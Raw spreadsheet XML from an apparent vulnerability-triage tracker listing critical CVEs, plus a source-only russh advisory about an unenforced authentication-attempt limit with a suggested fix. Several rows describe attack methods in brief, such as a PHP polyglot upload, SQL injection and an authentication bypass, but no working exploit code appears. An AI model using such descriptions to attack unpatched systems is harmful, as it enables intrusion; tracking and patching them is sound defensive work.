      <c r="E126" s="5" t="inlineStr"/>
      <c r="F126" s="5" t="inlineStr"/>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M126" s="5" t="inlineStr">
        <is>
          <t>0.62.6</t>
        </is>
      </c>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr"/>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>### Details
#### Affected versions and vulnerable location
- Confirmed present on default branch `main` at HEAD `0089c89c94753bebbec12b956c07a1cd38740379`.
- Crate version at HEAD: `0.62.4`.
- Vulnerable locations on current default branch:
  - `russh/src/server/mod.rs:91` (`pub max_auth_attempts: usize`)
  - `russh/src/server/mod.rs:121` (default `max_auth_attempts: 10`)
  - `russh/src/server/encrypted.rs:89` (`USERAUTH_REQUEST` dispatch into auth handler path)
  - `russh/src/server/encrypted.rs:98` (`self.common.auth_attempts += 1`)
  - `russh/src/server/encrypted.rs:53` (only runtime read of `auth_attempts`, used for initial reject timing, not attempt limiting)
- Default-branch history check did not show a newer merged commit adding enforcement against `config.max_auth_attempts`.
#### Reachability trace verified
1. Entry point: exported server API `server::run_stream` in `russh/src/server/mod.rs:1049`.
2. Session run loop in `russh/src/server/session.rs` processes incoming packets and calls `reply(...)` (`server/session.rs:725`).
3. `reply` forwards encrypted packets to `session.server_read_encrypted(...)` (`server/mod.rs:1221`).
4. `server_read_encrypted` routes `USERAUTH_REQUEST` to `enc.server_read_auth_request(...)` (`server/encrypted.rs:89`).
5. On each request, `self.common.auth_attempts += 1` executes (`server/encrypted.rs:98`).
6. No comparison against `self.common.config.max_auth_attempts` is present in this runtime flow.
### PoC
#### Reproduction steps and observed output
I did not run a full server process in this environment because Rust tooling is unavailable. I verified the issue from source and command output on the audited tree.
1. Show where `max_auth_attempts` appears:
```bash
rtk rg -n "max_auth_attempts" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/encrypted.rs .scratch/russh/russh/src/server/session.rs
```
Observed:
```text
.scratch/russh/russh/src/server/mod.rs:91:    pub max_auth_attempts: usize,
.scratch/russh/russh/src/server/mod.rs:121:            max_auth_attempts: 10,
.scratch/russh/russh/src/server/mod.rs:148:            .field("max_auth_attempts", &amp;self.max_auth_attempts)
```
2. Show runtime auth-attempt handling:
```bash
rtk rg -n "auth_attempts == 0|auth_attempts \\+= 1" .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
53:        let initial_none_rejection_wait_until = if self.common.auth_attempts == 0 {
98:                self.common.auth_attempts += 1;
```
3. Show production entrypoint-to-auth path references:
```bash
rtk rg -n "pub async fn run_stream|match reply\\(|server_read_encrypted\\(|server_read_auth_request\\(" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/session.rs .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
.scratch/russh/russh/src/server/encrypted.rs:89:                enc.server_read_auth_request(
.scratch/russh/russh/src/server/session.rs:725:                            match reply(&amp;mut self, &amp;mut handler, &amp;mut pkt).await {
.scratch/russh/russh/src/server/mod.rs:1049:pub async fn run_stream&lt;H, R&gt;(
.scratch/russh/russh/src/server/mod.rs:1221:    session.server_read_encrypted(handler, pkt).await
```
4. Toolchain check:
```bash
cargo --version
```
Observed:
```text
/bin/bash: line 1: cargo: command not found
```
### Impact
#### Attacker model
- Attacker: unauthenticated remote client with TCP reachability to a russh-backed SSH service.
- Preconditions: deployer expects `server::Config.max_auth_attempts` to cap attempts.
- Impact: repeated `USERAUTH_REQUEST` attempts continue for a single connection beyond configured limit, increasing online guessing opportunity and backend auth workload.
### Suggested fix
Enforce `max_auth_attempts` in the `USERAUTH_REQUEST` branch before invoking auth-method handlers, and fail closed once threshold is reached.
Concrete patch direction in `russh/src/server/encrypted.rs`:
```rust
if self.common.config.max_auth_attempts &gt; 0
    &amp;&amp; self.common.auth_attempts &gt;= self.common.config.max_auth_attempts
{
    self.common.disconnect(
        Disconnect::NoMoreAuthMethodsAvailable,
        "Too many authentication attempts",
        "",
    )?;
    return Ok(());
}
```
### How it was found and a note on tooling
The researcher synthesized three lens outputs, then revalidated each claim against current `main`: source presence and commit history, advisory overlap checks in both GitHub advisories and OSV, entrypoint-to-sink reachability, attacker-model realism, and execution-claim integrity. The researcher used `gh`, `git`, `rg`, and direct source inspection under `.scratch/russh`. Because Rust tooling is unavailable in this worker, this report is intentionally marked `source-only`.
AI assistance was used while investigating this and while drafting this report. The finding was verified by reading the cited code at HEAD. The vulnerability was not executed it, and that limit is stated plainly above rather than left implied.
Credits: arpitjain099.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T126"/>
  <conditionalFormatting sqref="E2:E12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2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CVE-2026-76504</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:catalyst_sd-wan_manager</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-03</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-177</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API session-based authentication management of Cisco Catalyst SD-WAN Manager could allow an unauthenticated, remote attacker to access an affected system with privileges of the admin user.
This vulnerability is due to improper handling of URI encoding in an HTTP request, which allows the request to bypass an authentication rule that is intended to restrict access to a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted HTTP request to the API of the affected system. A successful exploit could allow the attacker to bypass authentication and gain access to the API as the admin user.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76504</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CVE-2026-76504</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:catalyst_sd-wan_manager</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-03</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-177</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API session-based authentication management of Cisco Catalyst SD-WAN Manager could allow an unauthenticated, remote attacker to access an affected system with privileges of the admin user.
This vulnerability is due to improper handling of URI encoding in an HTTP request, which allows the request to bypass an authentication rule that is intended to restrict access to a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted HTTP request to the API of the affected system. A successful exploit could allow the attacker to bypass authentication and gain access to the API as the admin user.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76504</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102427</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S3" s="5"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the uploaded file’s content with a real magic-byte MIME check, but the extension allow-list that would otherwise restrict the saved file’s extension was present in the source and commented out. The saved file’s extension was taken directly from the attacker-supplied filename with no validation, and the file was written to a path directly under the Joomla web root that is executed by the PHP handler. An image/PHP polyglot, a file whose header bytes satisfy the MIME check with PHP source appended after, passed the content check while carrying a .php extension of the attacker’s choosing.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102427</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55107</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Kobako is a Ruby gem that embeds a Wasm-isolated mruby interpreter inside applications, allowing execution of untrusted Ruby scripts (LLM-generated code, user formulas, student submissions, third-party plugins) in-process without giving them access to host memory, files, network, or credentials. From version 0.1.0 to before version 0.9.1, a guest mruby script running inside the Kobako sandbox can execute arbitrary Ruby in the host process, fully escaping the sandbox. This issue has been patched in version 0.9.1.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55107</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76570</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomcode.com - Unauthenticated SQL injection in read and write queries in JCTables  1.21.1 - The front-end CRUD API controller performs no Joomla token validation and no authentication check on any task. Table names, column names, and values are taken directly from request parameters and concatenated into SQL queries, allowing SQLi for reading and writing queries.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76570</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96349</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in SiteSkite &lt;= 2.1.8 versions.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96349</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100512</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Nested Pages &lt;= 3.3.2 versions.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100512</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102115</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core did not correctly validate a parameter submitted to the password reset workflow. An unauthenticated attacker who knew the email address of a user with a locally stored password could potentially reset that account's password without access to the emailed reset link and then authenticate as that user, including where the account holds administrative privileges.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102115</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18782</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Trex Digital Smart Manufacturing Systems Inc. Trex MES allows Command Line Execution through SQL Injection.
This issue affects Trex MES: through 2026-09-29.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18782</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55494</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.4, Tugtainer Agent allows unauthenticated access to Docker management APIs when AGENT_SECRET is not configured. The Agent uses request signatures to protect its API routes. However, in agent/auth.py, the signature verification function returns successfully if Config.AGENT_SECRET is empty. This causes protected Agent APIs to become accessible without authentication. This issue has been patched in version 1.30.4.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55494</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82307</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Dolusoft Software Technologies SOPLOG allows SQL Injection.
This issue affects SOPLOG: before Soplog 2026.9.4.1.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82307</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88920</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass in the DOM security processor in Apache WSS4J allows unauthenticated remote attackers to forge authenticated SOAP messages via a crafted unsigned SAML sender-vouches assertion containing an attacker-controlled key.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88920</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96350</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Estatik &lt;= 4.3.5 versions.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96350</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97248</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
